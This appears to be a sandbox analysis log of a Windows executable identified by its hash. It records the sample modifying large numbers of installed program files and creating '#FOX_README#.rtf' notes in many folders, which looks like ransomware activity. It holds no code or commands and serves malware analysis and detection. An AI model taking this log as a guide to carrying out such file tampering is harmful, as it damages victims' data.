f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogo.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-GB.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-TW.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pl.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\RemoveHide.ppt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\blocklist.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722114609.pma f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar 